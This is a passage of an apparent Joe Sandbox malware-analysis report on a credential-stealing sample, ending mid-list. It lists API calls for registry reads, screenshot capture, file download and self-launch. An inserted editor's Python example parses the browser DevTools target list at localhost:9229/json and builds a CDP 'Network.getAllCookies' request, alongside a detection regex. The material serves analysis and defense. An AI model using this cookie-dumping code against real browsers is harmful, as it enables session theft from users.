                            • RegCloseKey.ADVAPI32(?), ref: 00143A28
                            • RegQueryValueExA.ADVAPI32(?,013FE0B8,00000000,000F003F,?,?), ref: 00143A71
                            • lstrlen.KERNEL32(?), ref: 00143A86
                            • RegQueryValueExA.ADVAPI32(?,013FE088,00000000,000F003F,?,00000400), ref: 00143AF7
                            • RegCloseKey.ADVAPI32(?), ref: 00143B42
                            • RegCloseKey.ADVAPI32(?), ref: 00143B59
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 13140697-3278919252
                            • Opcode ID: 62f6904c203745c3735bc6e5f834a94eb6f6b0170eb03bd53ef970448cea9cc2
                            • Instruction ID: aca315c993815bd59dde3634e08af15f8c6524d7080fc724e1ed165b943cdd6e
                            • Opcode Fuzzy Hash: 62f6904c203745c3735bc6e5f834a94eb6f6b0170eb03bd53ef970448cea9cc2
                            • Instruction Fuzzy Hash: B7919CB2900218DFCB10DFA4DC84AEEB7B9FB48315F148569E509BB261D731AE46CF90
                            APIs
                            • InternetOpenA.WININET(0014CFF4,00000001,00000000,00000000,00000000), ref: 001290DF
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 001290FC
                            • InternetCloseHandle.WININET(00000000), ref: 00129109
                            • InternetReadFile.WININET(?,?,?,00000000), ref: 00129166
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00129197
                            • InternetCloseHandle.WININET(00000000), ref: 001291A2
                            • InternetCloseHandle.WININET(00000000), ref: 001291A9
                            • strlen.MSVCRT ref: 001291BA
                            • strlen.MSVCRT ref: 001291ED
                            • strlen.MSVCRT ref: 0012922E
                            • strlen.MSVCRT ref: 0012924C
                              • Part of subcall function 00128980: std::_Xinvalid_argument.LIBCPMT ref: 00128996
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 1530259920-2144369209
                            • Opcode ID: 75caabca301e78e28346ed22cc62832de8fda12fa0089076157846c4b87d283d
                            • Instruction ID: 032ffd99ee81433cf939835dd657fe6a254981e1510dac7efdbc8cc265b47263
                            • Opcode Fuzzy Hash: 75caabca301e78e28346ed22cc62832de8fda12fa0089076157846c4b87d283d
                            • Instruction Fuzzy Hash: E151E671A00205ABDB20DBA8EC45BEEF7F9DF48711F140169F904F7290DBB4DA8887A1
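                            The function above is the DevTools-protocol discovery step of the cookie theft: it fetches http://localhost:9229/json (the target list exposed by a Chromium browser started with a remote-debugging port, or by a Node.js inspector) and scans the response body for the literal strings "webSocketDebuggerUrl": and "ws://. The Python below is an added example by the editor, not code from the report or from the sample: it reproduces that substring scan on a constructed /json response, shows the robust JSON-based equivalent, builds the CDP message a client would send next (the Network.getAllCookies method is an assumption about the next step, the report only shows the discovery request), and gives a small detection helper for HTTP requests to a loopback discovery endpoint. SAMPLE_JSON_RESPONSE, the target id and title, and all function names are the editor's inventions.

```python
"""Added example (not from the Joe Sandbox report or the analysed sample):
DevTools discovery (http://localhost:9229/json) parsing, the CDP cookie-dump
request, and a detection helper. Runs offline on a constructed response."""
import json
import re

# Constructed sample of a /json discovery response. The field names are the
# real DevTools discovery fields; the id, title and URL values are made up.
SAMPLE_JSON_RESPONSE = json.dumps([
    {
        "description": "",
        "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/ABC123",
        "id": "ABC123",
        "title": "New Tab",
        "type": "page",
        "url": "chrome://newtab/",
        "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/ABC123",
    }
])


def extract_ws_url_like_sample(body: str) -> str:
    """Mimic the sample's approach: find '"webSocketDebuggerUrl":', then the next
    '"ws://', and take the text up to the closing quote. Returns the sentinel
    'ERROR' on failure, the same sentinel the report's string helpers copy."""
    key = '"webSocketDebuggerUrl":'
    i = body.find(key)
    if i < 0:
        return "ERROR"
    j = body.find('"ws://', i + len(key))
    if j < 0:
        return "ERROR"
    j += 1  # skip the opening quote
    k = body.find('"', j)
    if k < 0:
        return "ERROR"
    return body[j:k]


def extract_ws_urls(body: str) -> list:
    """The robust equivalent: parse the JSON and collect every target's URL."""
    targets = json.loads(body)
    return [t["webSocketDebuggerUrl"] for t in targets if "webSocketDebuggerUrl" in t]


def build_get_all_cookies_request(msg_id: int = 1) -> str:
    """CDP message that dumps every cookie of the debugged browser profile.
    Assumption (not shown in the report): the sample sends this over the
    WebSocket it just discovered."""
    return json.dumps({"id": msg_id, "method": "Network.getAllCookies"})


_DISCOVERY_RE = re.compile(r"http://(localhost|127\.0\.0\.1):\d{2,5}/json(/list)?/?")


def is_devtools_discovery_request(url: str) -> bool:
    """Detection helper: an HTTP request from a non-browser process to the
    loopback DevTools discovery endpoint is not something normal user activity
    generates and is worth alerting on."""
    return _DISCOVERY_RE.fullmatch(url) is not None
```

                            The substring scan is faithful to what the disassembly shows (four strlen calls and fixed string anchors) and is fragile in the same way: any target list whose first entry lacks a webSocketDebuggerUrl, or whose URL is not quoted immediately after the key, makes it return ERROR. For monitoring, pair the URL check with the process that made the request; a browser is expected to talk to its own debugging port, a freshly dropped executable is not.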
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00141871
                            • lstrcpy.KERNEL32(00000000,013EB8A0), ref: 0014189C
                            • lstrlen.KERNEL32(?), ref: 001418A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001418C6
                            • lstrcat.KERNEL32(00000000,?), ref: 001418D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001418FA
                            • lstrlen.KERNEL32(013FA400), ref: 0014190F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00141932
                            • lstrcat.KERNEL32(00000000,013FA400), ref: 0014193A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141962
                            • ShellExecuteEx.SHELL32(?), ref: 0014199D
                            • ExitProcess.KERNEL32 ref: 001419D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                            • String ID: <
                            • API String ID: 3579039295-4251816714
                            • Opcode ID: 4e18a1507ae43ab5b5e44526324c2cdd39c7c9173c35fe70ab5fcc00f4a3f343
                            • Instruction ID: ed9a982913c17024fe3082564a656340237b0f272088fe1bdc74b0982b79ab00
                            • Opcode Fuzzy Hash: 4e18a1507ae43ab5b5e44526324c2cdd39c7c9173c35fe70ab5fcc00f4a3f343
                            • Instruction Fuzzy Hash: 0F51607190172AEBDB12DFA4DC84A9EB7FDAF58305F044525E905E3261DB30AE41CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F1C4
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F1F2
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0013F206
                            • lstrlen.KERNEL32(00000000), ref: 0013F215
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 0013F233
                            • StrStrA.SHLWAPI(00000000,?), ref: 0013F261
                            • lstrlen.KERNEL32(?), ref: 0013F274
                            • lstrlen.KERNEL32(00000000), ref: 0013F292
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 0013F2DF
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 0013F31F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$AllocLocal
                            • String ID: ERROR
                            • API String ID: 1803462166-2861137601
                            • Opcode ID: 807d8cf9bf2f48e04b6aa0a6d6377cba27d8e12598a6b4563ab0c54182bcfebb
                            • Instruction ID: e43277c5c5862216a530b74a060ff7ffb718bb27bbe69f199df7c85e07b01377
                            • Opcode Fuzzy Hash: 807d8cf9bf2f48e04b6aa0a6d6377cba27d8e12598a6b4563ab0c54182bcfebb
                            • Instruction Fuzzy Hash: 2851B135D10225EFCB22AF38EC4AA6F77A4AF65305F144269FC4ADB655DB30DC128790
                            APIs
                            • GetEnvironmentVariableA.KERNEL32(013F91B8,00359BD8,0000FFFF), ref: 0012A026
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012A053
                            • lstrlen.KERNEL32(00359BD8), ref: 0012A060
                            • lstrcpy.KERNEL32(00000000,00359BD8), ref: 0012A08A
                            • lstrlen.KERNEL32(00154C50), ref: 0012A095
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012A0B2
                            • lstrcat.KERNEL32(00000000,00154C50), ref: 0012A0BE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012A0E4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0012A0EF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012A114
                            • SetEnvironmentVariableA.KERNEL32(013F91B8,00000000), ref: 0012A12F
                            • LoadLibraryA.KERNEL32(013FDA78), ref: 0012A143
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                            • String ID:
                            • API String ID: 2929475105-0
                            • Opcode ID: 23902970cb41e25d60c95972b4478d661afe444adfe6131faf527100bae4d337
                            • Instruction ID: 09fb087b20f920fffba5e75960e650f7767b5ef459bec4df129c25950ce4b3e5
                            • Opcode Fuzzy Hash: 23902970cb41e25d60c95972b4478d661afe444adfe6131faf527100bae4d337
                            • Instruction Fuzzy Hash: 0691C130A00B21DFD7329FA4FC45A6A37B9EF54716F800119E805976A2EF75DDA0CB82
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013CA92
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013CAC1
                            • lstrlen.KERNEL32(00000000), ref: 0013CAEC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013CB22
                            • StrCmpCA.SHLWAPI(00000000,00154C44), ref: 0013CB33
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: defd84c55a876b34bfb06d73ea0dbc78273901d29bd166f8f710b90fb6c28acf
                            • Instruction ID: 1b5d8c6550d2ada788d05a7217001096b3bd485e78dd7ec9aab6ffc3feea270f
                            • Opcode Fuzzy Hash: defd84c55a876b34bfb06d73ea0dbc78273901d29bd166f8f710b90fb6c28acf
                            • Instruction Fuzzy Hash: 0D611471D01326ABCB11EFB4DD89AAEBBF8AF18701F041129E845F7211D7349D458BE0
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00140EC0), ref: 00144486
                            • GetDesktopWindow.USER32 ref: 00144490
                            • GetWindowRect.USER32(00000000,?), ref: 0014449D
                            • SelectObject.GDI32(00000000,00000000), ref: 001444CF
                            • GetHGlobalFromStream.COMBASE(00140EC0,?), ref: 00144546
                            • GlobalLock.KERNEL32(?), ref: 00144550
                            • GlobalSize.KERNEL32(?), ref: 0014455D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                            • String ID:
                            • API String ID: 1264946473-0
                            • Opcode ID: 4a50de609d66a279f11348f4e5ac72a837911ccc61236ccbd2612d3e783a9a56
                            • Instruction ID: 6b54908f6fb51a4782418d88faf81702cc5584b9cbffc3f223dea6d3f6f96cce
                            • Opcode Fuzzy Hash: 4a50de609d66a279f11348f4e5ac72a837911ccc61236ccbd2612d3e783a9a56
                            • Instruction Fuzzy Hash: C5512E75A10218AFDB11EFA4EC85AEE77BDEF58311F104519F905E7260DB34AE05CBA0
                            APIs
                            • lstrcat.KERNEL32(?,013FE400), ref: 0013E1ED
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013E217
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E24F
                            • lstrcat.KERNEL32(?,00000000), ref: 0013E25D
                            • lstrcat.KERNEL32(?,?), ref: 0013E278
                            • lstrcat.KERNEL32(?,?), ref: 0013E28C
                            • lstrcat.KERNEL32(?,013EB850), ref: 0013E2A0
                            • lstrcat.KERNEL32(?,?), ref: 0013E2B4
                            • lstrcat.KERNEL32(?,013FD998), ref: 0013E2C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E2FF
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0013E306
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 4230089145-0
                            • Opcode ID: 5518874757bcd226baa9cabbb0d2283ac99810ed6381acc5f4e1c7a482629766
                            • Instruction ID: 59fc7d15b5a30c9d08330f2f3f68023406a535ce62896dfb8a9fc790fd7ec7ed
                            • Opcode Fuzzy Hash: 5518874757bcd226baa9cabbb0d2283ac99810ed6381acc5f4e1c7a482629766
                            • Instruction Fuzzy Hash: 81616D7191022CEBCB65DB64DC45BDDB7B8BF98301F1049A9F60AA3294DB709F858F90
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00126AFF
                            • InternetOpenA.WININET(0014CFF4,00000001,00000000,00000000,00000000), ref: 00126B2C
                            • StrCmpCA.SHLWAPI(?,013FE938), ref: 00126B4A
                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00126B6A
                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00126B88
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00126BA1
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00126BC6
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00126BF0
                            • CloseHandle.KERNEL32(00000000), ref: 00126C10
                            • InternetCloseHandle.WININET(00000000), ref: 00126C17
                            • InternetCloseHandle.WININET(?), ref: 00126C21
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                             • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
